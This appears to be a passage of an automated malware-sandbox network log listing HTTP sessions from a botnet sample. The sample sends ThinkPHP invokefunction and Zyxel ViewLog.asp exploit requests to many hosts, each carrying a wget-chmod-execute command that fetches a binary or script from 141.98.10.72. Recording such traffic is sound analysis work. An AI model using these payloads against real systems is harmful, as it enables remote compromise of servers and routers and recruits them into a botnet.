                                                        Feb 14, 2024 09:33:10.064711094 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:10.293629885 CET321INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.16.0
                                                        Date: Wed, 14 Feb 2024 08:33:10 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.16.0</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        129192.168.2.145345695.154.219.24680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:10.228723049 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:10.421027899 CET423INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:33:10 GMT
                                                        Server: Apache/2.4.37 (AlmaLinux)
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        130192.168.2.145981695.100.77.17680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:10.246404886 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:10.449084044 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:33:10 GMT
                                                        Date: Wed, 14 Feb 2024 08:33:10 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 30 37 61 37 62 35 63 26 23 34 36 3b 31 37 30 37 38 39 39 35 39 30 26 23 34 36 3b 34 66 35 65 32 37 61 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;907a7b5c&#46;1707899590&#46;4f5e27ae</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        131192.168.2.144593495.101.154.8580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:10.249480963 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:10.455589056 CET479INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 257
                                                        Expires: Wed, 14 Feb 2024 08:33:10 GMT
                                                        Date: Wed, 14 Feb 2024 08:33:10 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 64 35 61 31 36 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 35 39 30 26 23 34 36 3b 38 36 63 38 65 32 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;2d5a1602&#46;1707899590&#46;86c8e2f</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        132192.168.2.145036295.217.171.3280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:10.290031910 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:10.517023087 CET321INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.24.0
                                                        Date: Wed, 14 Feb 2024 08:33:10 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        133192.168.2.144365888.102.200.15980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:10.482052088 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:10.703980923 CET238INHTTP/1.1 404 Not Found
                                                        Content-Length: 0
                                                        Date: Wed, 14 Feb 2024 08:33:10 GMT
                                                        X-Frame-Options: sameorigin
                                                        Content-Security-Policy: frame-ancestors 'self'
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1; mode=block


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        134192.168.2.143841088.221.207.11480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:10.483962059 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:10.702716112 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:33:10 GMT
                                                        Date: Wed, 14 Feb 2024 08:33:10 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 32 62 35 33 65 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 35 39 30 26 23 34 36 3b 37 63 64 61 34 35 39 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;92b53e17&#46;1707899590&#46;7cda4595</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        135192.168.2.143999288.200.21.15380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:10.523734093 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:10.758529902 CET337INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.14.1
                                                        Date: Wed, 14 Feb 2024 08:33:10 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 173
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        136192.168.2.143294662.46.70.168080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:11.791640997 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:12.036540985 CET421INHTTP/1.1 404
                                                        Vary: Origin
                                                        Vary: Access-Control-Request-Method
                                                        Vary: Access-Control-Request-Headers
                                                        Content-Disposition: inline;filename=f.txt
                                                        Content-Type: application/json
                                                        Transfer-Encoding: chunked
                                                        Date: Wed, 14 Feb 2024 08:33:11 GMT
                                                        Keep-Alive: timeout=60
                                                        Connection: keep-alive
                                                        Data Raw: 36 63 0d 0a 7b 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 34 2d 30 32 2d 31 34 54 30 38 3a 33 33 3a 31 31 2e 39 32 31 2b 30 30 3a 30 30 22 2c 22 73 74 61 74 75 73 22 3a 34 30 34 2c 22 65 72 72 6f 72 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 2c 22 70 61 74 68 22 3a 22 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 22 7d 0d 0a
                                                        Data Ascii: 6c{"timestamp":"2024-02-14T08:33:11.921+00:00","status":404,"error":"Not Found","path":"/cgi-bin/ViewLog.asp"}


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        137192.168.2.143953485.199.78.278080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:11.797977924 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        138192.168.2.144412262.29.112.2308080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:11.804771900 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        139192.168.2.143760031.200.65.878080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:11.805232048 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        140192.168.2.146022694.122.207.2198080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:11.805389881 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        141192.168.2.145852094.122.120.1378080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:11.806375027 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        142192.168.2.144381694.122.223.968080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:11.806448936 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        143192.168.2.144528662.29.39.1688080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:11.808564901 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        144192.168.2.144494431.200.28.2258080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:11.808842897 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        145192.168.2.144441262.29.110.188080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:11.808933973 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        146192.168.2.143996862.29.111.1618080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:11.810611963 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        147192.168.2.145852294.187.107.2028080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:11.811541080 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        148192.168.2.143373085.198.12.1598080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:11.854784966 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
